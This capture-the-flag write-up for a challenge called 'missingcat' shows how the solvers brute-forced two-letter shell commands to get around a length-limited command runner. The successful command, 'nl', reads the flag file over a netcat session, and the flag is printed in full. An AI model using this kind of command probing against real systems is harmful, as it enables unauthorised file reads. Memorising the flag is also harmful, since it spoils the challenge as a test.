missingcat
Where is my cat? 😿
Category: misc
Solver: frcroth, mp455
Flag: ENO{0xCAT_BUT_H4PP1_THANK_Y0U!}
We were given the following script:
import subprocess
cmd = input("Give me your command: ")
if len(cmd) > 2:
print("Command is too long!")
try:
cmdstring = [cmd, "flag.txt"]
print(f"Executed command: {cmdstring}")
result = subprocess.check_output(cmdstring, timeout=1)
except:
result = b"No 😿"
print(result.decode())
So we need to find a command that gives us the flag and whose name is only 2 letters long. Now one could think about this for a while, or write a script that automatically checks all 2 letter commands.
Create a file with the string “ENO”. This script generates every combination of 2 letter words and tries to use these letters as a command. It is then checked if the otuput contains “ENO” and thus the file was read (also the file is recreated because at least rm will delete the file).
import itertools
import os
import subprocess
# Generate all 2-letter combinations
combinations = [''.join(comb) for comb in itertools.product('abcdefghijklmnopqrstuvwxyz.][', repeat=2)]
for combination in combinations:
if not os.path.exists('flag.txt'):
with open('flag.txt', 'w') as file:
file.write('ENO')
try:
result = subprocess.run(['python', 'chall.py'], input=combination, capture_output=True, text=True).stdout
except:
result = "Nope!"
if 'ENO' in result:
print(combination)
print(result)
exit()
Running this script soon gave us a possible answer: “nl”. This utility numbers the lines of a file. Thus it returns the flag in the file with a line number. Neat.
❯ nc 52.59.124.14 5001 Give me your command: nl Executed command: [’nl’, ‘flag.txt’] 1 #!/bin/sh 2 # FLAG=ENO{0xCAT_BUT_H4PP1_THANK_Y0U!} 3 # Have you tried ./😿 ?
When we try giving just “😿” as hinted, this also works just as the “cat” command, so there seems to be a “😿” binary/link in the directory.